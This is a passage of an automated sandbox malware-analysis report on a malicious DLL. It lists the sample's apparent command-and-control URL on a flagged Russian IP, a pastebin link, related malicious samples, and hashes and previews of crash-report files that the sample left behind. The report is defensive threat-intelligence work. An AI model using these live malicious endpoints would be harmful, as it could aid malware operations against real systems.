http://192.124.216.14/conta/index.phpUrundll32.exe, 00000004.00000002.1839038476.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.2547697268.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1771573428.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000D.00000002.1832986778.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.1894247823.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.1874677140.000000006A081000.00000020.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://upx.sf.netAmcache.hve.11.drfalse
    		high
    http://www.indyproject.org/rundll32.exe, rundll32.exe, 00000006.00000002.2544670211.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2547697268.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1771573428.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1771012396.0000000004C50000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.1768168983.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.1832986778.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000D.00000003.1783546072.00000000046C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.1894247823.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.1893636039.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.1874677140.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.1874062186.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1834981367.0000000004D80000.00000004.00001000.00020000.00000000.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://pastebin.com/raw/vn1EtvP0rundll32.exe, rundll32.exe, 00000006.00000002.2547697268.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1771573428.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000D.00000002.1832986778.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.1894247823.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.1874677140.000000006A081000.00000020.00000001.01000000.00000003.sdmpfalse
      		high

      World Map of Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public IPs

      IPDomainCountryFlagASNASN NameMalicious
      192.124.216.14
      		unknownRussian Federation
      		15455EMBANK-ASRUtrue

      General Information

      Joe Sandbox version:41.0.0 Charoite
      Analysis ID:1572153
      Start date and time:2024-12-10 07:25:33 +01:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 7m 13s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:27
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:Y7KU3yvGQ6.dll
      renamed because original name is a hash value
      Original Sample Name:ed7c5857a2a61a69f73ca5f01c0f1c8c.dll
      Detection:MAL
      Classification:mal96.evad.winDLL@26/17@0/1
      EGA Information:Failed
      HCA Information:Failed
      Cookbook Comments:
      • Found application associated with file extension: .dll

      Warnings

      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
      • Excluded IPs from analysis (whitelisted): 20.189.173.22, 13.107.246.63, 4.245.163.56, 40.126.53.11
      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
      • Not all processes where analyzed, report is missing behavior information
      • Report size exceeded maximum capacity and may have missing behavior information.

      Simulations

      Behavior and APIs

      TimeTypeDescription
      01:26:51API Interceptor1x Sleep call for process: loaddll32.exe modified
      01:27:13API Interceptor4x Sleep call for process: WerFault.exe modified

      Joe Sandbox View / Context

      IPs

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      192.124.216.14Fatura931Pendente956.pdf761.msiGet hashmaliciousUnknownBrowse
      • 192.124.216.14/ana/index.php

      Domains

      No context

      ASNs

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      EMBANK-ASRUFatura931Pendente956.pdf761.msiGet hashmaliciousUnknownBrowse
      • 192.124.216.14
      https://marketing.edinburghairport.com/4QNA-A60M-5IWCT9-JVKO0-1/c.aspx?_externalContentRedirect=https://link.sbstck.com/redirect/43698733-83ea-4129-b836-e9d43d1ad5ed?j=eyJ1IjoiNDltdXZ6In0.CxolcWPhPGrBgw3rA0jd5lscc71sjQLfIOZNSPA48EYGet hashmaliciousUnknownBrowse
      • 192.124.216.133
      https://marketing.edinburghairport.com/4QNA-A60M-5IWCT9-JVKO0-1/c.aspx?_externalContentRedirect=https://link.sbstck.com/redirect/43698733-83ea-4129-b836-e9d43d1ad5ed?j=eyJ1IjoiNDltdXZ6In0.CxolcWPhPGrBgw3rA0jd5lscc71sjQLfIOZNSPA48EYGet hashmaliciousHTMLPhisherBrowse
      • 192.124.216.133

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_1f7ade6daf7a67fbdf25e38a686ea9d66069911_7522e4b5_575e0a33-138a-45a6-8239-e8a0a9024346\Report.wer

      Download File
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):0.9842674127966813
      Encrypted:false
      SSDEEP:192:J5iNOF80BU/wjeTf3KZrbzuiFXZ24IO8dci:niEF3BU/wje2zuiFXY4IO8dci
      MD5:DE6E224142BC19EFCABB5ED4AFE7E324
      SHA1:80A3EA0B2CA3C7491B611E2F81FDC7CF01A5A2C5
      SHA-256:EF44A63921BA74A32D4EF4230176FC330C378836B997560194CB3AE1C4E860D7
      SHA-512:5B5EEE8B12D1759FE6958EB0BD39AB525BFD295EBFB390C9A4A99DF61BABD9DC95D565822A82FDA1F714155323C3634EC3577797452CE137D47DF4A32A41FC7B
      Malicious:false
      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.2.8.5.6.1.6.1.0.2.3.2.0.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.2.8.5.6.2.1.6.3.3.5.5.3.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.7.5.e.0.a.3.3.-.1.3.8.a.-.4.5.a.6.-.8.2.3.9.-.e.8.a.0.a.9.0.2.4.3.4.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.f.7.2.0.7.3.e.-.d.a.b.6.-.4.6.9.8.-.b.2.b.d.-.1.b.5.f.a.4.4.b.c.5.0.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.9.c.-.0.0.0.1.-.0.0.1.3.-.0.d.c.7.-.6.9.7.4.c.c.4.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.

      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_1f7ade6daf7a67fbdf25e38a686ea9d66069911_7522e4b5_5f9ef4b5-c4ba-4928-8b49-b24720798806\Report.wer

      Download File
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):0.9848072498311455
      Encrypted:false
      SSDEEP:192:GKQVYiNOG80BU/wjeTf3KZrbzuiFHZ24IO8dci:tQVYiEG3BU/wje2zuiFHY4IO8dci
      MD5:F24019898FCE1EFCA39225500B98D62F
      SHA1:AFE2A235E2AA862BA06F7410EF04F77B2D6C2C3F
      SHA-256:7C35968D4159822E457B0C0FBA3156BFB9EDE2DAB48218CB4AFAD099CF3DD66A
      SHA-512:4FB571E6D72A2C0DBE824CF5FEC9B1B3A33EDC527C14DFA8B48A02AF6E9FD7419A6A2917EC809E4EAD0F0D8B28302B9DC2E2B77B65C90AA14DD41396DC707666
      Malicious:false
      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.2.8.5.6.4.1.0.3.9.6.3.6.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.2.8.5.6.4.2.1.3.3.3.8.8.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.f.9.e.f.4.b.5.-.c.4.b.a.-.4.9.2.8.-.8.b.4.9.-.b.2.4.7.2.0.7.9.8.8.0.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.e.e.3.d.6.f.1.-.0.5.e.5.-.4.f.7.9.-.a.6.d.a.-.a.1.9.5.e.1.4.1.4.5.5.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.5.c.-.0.0.0.1.-.0.0.1.3.-.7.f.6.d.-.6.a.7.f.c.c.4.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.

      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_f357e13d4bfa415c25da7a5c8cc18ab8b99e3_7522e4b5_8e7881f3-d045-4980-9318-ec5b186421fc\Report.wer

      Download File
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):0.9903302605494385
      Encrypted:false
      SSDEEP:192:sCibOM7tn0BU/wjeTfnZrJOzuiFXZ24IO84ci:9iiQt0BU/wjeWzuiFXY4IO84ci
      MD5:3E2E6CC1F0E95CC5D2B359888EB9B2A3
      SHA1:0F1641027E96D8E346FB9E16A5453B8C20C717A0
      SHA-256:61CCFF5A3255C0CB2EDB37605030195FE3589151C461492959268637CB62F804
      SHA-512:C42C3BF92F5CF0AA89BD9FCAB5E7D1D5D7DE1E1B7AC77C14580D1B11FCF12C582A2AC62E84689662EC4D50F5C8F6DE4BCB6D261245B40B48BCB5F0594EBCB723
      Malicious:false
      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.2.8.5.6.0.9.0.8.4.6.3.7.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.2.8.5.6.1.1.7.4.0.7.2.0.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.e.7.8.8.1.f.3.-.d.0.4.5.-.4.9.8.0.-.9.3.1.8.-.e.c.5.b.1.8.6.4.2.1.f.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.f.b.6.6.5.f.f.-.7.9.e.4.-.4.c.3.d.-.9.8.0.8.-.c.8.4.d.1.6.6.b.1.a.9.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.2.0.-.0.0.0.1.-.0.0.1.3.-.5.2.7.8.-.b.a.7.0.c.c.4.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.2.d.7.!.r.

      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_f357e13d4bfa415c25da7a5c8cc18ab8b99e3_7522e4b5_d4957075-efa2-411d-9ffb-7bb482699fbc\Report.wer

      Download File
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):0.9903365861443841
      Encrypted:false
      SSDEEP:192:MwiwODn0BU/wjeTf3KZrbzuiFHZ24IO84ci:rihD0BU/wje2zuiFHY4IO84ci
      MD5:59298120E248EF343D876735D2A184CF
      SHA1:255A7F1D79222A378A901DCFE1D7D25DE287A64A
      SHA-256:70872E0B00174B59FC9C7010C55170C7F5C40C89993D033B72F298105D913678
      SHA-512:96BF95677D53BAF422049D00EF480CFABAA9CA187661CE86E383E58AC6A74EC3BFA86E95F794B9787A91BFDEA0600327AC8B4D7178E405762B9743CAFF0C4810
      Malicious:false
      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.2.8.5.6.3.5.7.5.9.6.3.5.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.2.8.5.6.3.8.4.6.2.8.2.1.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.4.9.5.7.0.7.5.-.e.f.a.2.-.4.1.1.d.-.9.f.f.b.-.7.b.b.4.8.2.6.9.9.f.b.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.f.8.9.0.5.b.7.-.2.e.3.d.-.4.7.a.7.-.a.6.c.a.-.a.1.4.e.7.2.a.9.1.2.7.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.3.4.-.0.0.0.1.-.0.0.1.3.-.4.0.6.0.-.6.e.7.f.c.c.4.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.2.d.7.!.r.

      C:\ProgramData\Microsoft\Windows\WER\Temp\WER2875.tmp.dmp

      Download File
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:Mini DuMP crash report, 14 streams, Tue Dec 10 06:26:49 2024, 0x1205a4 type
      Category:dropped
      Size (bytes):51672
      Entropy (8bit):1.9505716282272412
      Encrypted:false
      SSDEEP:192:Ad4mAaU8lb5+YxXKYUJO5H4+3TxHqVdovS4ZxLUpsZdv8Bqe+lF:e4mAaBJdx5HfjQdMS6xLTZXj
      MD5:01E0C83146E341F05532DC9B4AE48616
      SHA1:3DE34E0B94FA714A49314827ADD309D5FD9DA8EE
      SHA-256:8138D7975AB3804740DF338DECF1DF2FDC4E3F0306A123B61413E7AF24D29C43
      SHA-512:75C7F1719A32D141AB18590937A93B4CA9628CF12A6DEBE33F37633007BF1142E9C29ABE27D891C2677156491AF34D4586EB9F8E2DB4A70CD2E258AA3F35558F
      Malicious:false
      Preview:MDMP..a..... .......).Wg....................................4....4..........T.......8...........T.......................................................................................................................eJ......D ......GenuineIntel............T....... .....Wg.............................0..=...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

      C:\ProgramData\Microsoft\Windows\WER\Temp\WER2AD8.tmp.WERInternalMetadata.xml

      Download File
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
      Category:dropped
      Size (bytes):8356
      Entropy (8bit):3.6936522029563714
      Encrypted:false
      SSDEEP:192:R6l7wVeJa06Dvw6YvU6oigmf84eprB89bbJsfopm:R6lXJh6Lw6Yc6Ngmf84NbifL
      MD5:0CFEEEE497A839C117695E54EA6340C8
      SHA1:916356CD276755228EAE3B1E4B52DA9C88078D8F
      SHA-256:BA2427A190D3CCC83CC845A2BFF78D9C86C341AAF466EDE27213926C9A547325
      SHA-512:C7D31F62CBA062892752D6C175202D87E7A608BF29738E9C31B679E744CDA07C822D93AFFC8C978144F98522F3E277CAEC80531DA15F6F85B06AC8C540DF0D2E
      Malicious:false
      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.4.4.<./.P.i.

      C:\ProgramData\Microsoft\Windows\WER\Temp\WER2B46.tmp.xml

      Download File
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):4751
      Entropy (8bit):4.460839373281276
      Encrypted:false
      SSDEEP:48:cvIwWl8zslJg77aI9SNWpW8VY8Ym8M4JCdPKZFu5+q8vjPKRLGScS5d:uIjf/I7k87V4JhMKmRLJ35d
      MD5:6FBDDB201057660179DB49782A47C5D4
      SHA1:E1C8D49AE35298D6B28896D1BB5886732D871715
      SHA-256:9B959040B6D5C6C70FCF00DD86D4707947467DAA6E5E61472AF4CF2506A9205F
      SHA-512:E3B74439CDDAA8F36C893C726E7A056FB0AFB331571F0CB8F143DFB1E9089BD1C27628E80A6D5B0872864518E8D1725C258F6F07B7B30B0B74F03A82DA7162FB
      Malicious:false
      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="624809" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

      C:\ProgramData\Microsoft\Windows\WER\Temp\WER442B.tmp.dmp

      Download File
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:Mini DuMP crash report, 14 streams, Tue Dec 10 06:26:57 2024, 0x1205a4 type
      Category:dropped
      Size (bytes):45204
      Entropy (8bit):2.094103365036255
      Encrypted:false
      SSDEEP:192:IxyBXQ8/XAIjfO5H4e3uo0WOEbNUbrHY49ecyPhU:Prpy5H3QibNG44uPm
      MD5:44B783C4259B14E29E52678A4BF8C684
      SHA1:26698030BD84A916B5B07F93321A5332FF10CC7D
      SHA-256:69E8702EA24F89CC77873F01AA7600C73175D2CF666B91B54AF192885344F930
      SHA-512:0BCECCE8D8319538137277F8DFF3CA18E32D3AC37829CB7544DB4F06610E2403691722F7D611888AF087ABF441D743DD987D41E8AD09712F3F4A10C559BFA97D
      Malicious:false
      Preview:MDMP..a..... .......1.Wg.........................................1..........T.......8...........T.......................................|...............................................................................eJ....... ......GenuineIntel............T.............Wg.............................0..=...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

      C:\ProgramData\Microsoft\Windows\WER\Temp\WER48DF.tmp.WERInternalMetadata.xml

      Download File
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
      Category:dropped
      Size (bytes):8320
      Entropy (8bit):3.696619060373029
      Encrypted:false
      SSDEEP:192:R6l7wVeJdi6e96YKK6bVgmfT4epr689bkisfcsm:R6lXJY6e96Y/6bVgmfT4gkhfO
      MD5:D456099D31EC697D2F9B0B4BE8F1D1F1
      SHA1:CB8E07275009B896338A056B2D7A268E4BD65EEB
      SHA-256:5B15C70230A447C477C412A831B39898BBEDBAD50CA05566120693539C1E9DAA
      SHA-512:81270F071AB830AABC41E5DC88C7F2867D72E612CA7CDE255BD6A0C739011A9BE298DEC2061F34752C3977D39A58B9660323E5E113E00E44D7DD7FDFD73D5D78
      Malicious:false
      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.4.3.6.<./.P.i.

      C:\ProgramData\Microsoft\Windows\WER\Temp\WER496D.tmp.xml

      Download File
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):4650
      Entropy (8bit):4.473952328929013
      Encrypted:false
      SSDEEP:48:cvIwWl8zslJg77aI9SNWpW8VYh5Ym8M4JCdPzF3+q8/7lGScSbd:uIjf/I7k87VaoJysJ3bd
      MD5:BBE470D21CC75C5F1AA27070AC535201
      SHA1:3D251AFCFEFC91649476A3AE9B81C5279EED414A
      SHA-256:21A0CF19B6EB39F7DB3463EBBD293F2E9E4FFABF4815468C80C927A082D3D5A4
      SHA-512:8161F7A99B46B121AB25E65C4E4E126D29196D9EF5F8FF49D99A055E4E6108550EE2F68703ECC767398D02FEE15A2F5A654C931A9363F25D6BEF2FF7479C3CAD
      Malicious:false
      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="624809" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

      C:\ProgramData\Microsoft\Windows\WER\Temp\WER9076.tmp.dmp

      Download File
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:Mini DuMP crash report, 14 streams, Tue Dec 10 06:27:16 2024, 0x1205a4 type
      Category:dropped
      Size (bytes):45676
      Entropy (8bit):2.0263254461400906
      Encrypted:false
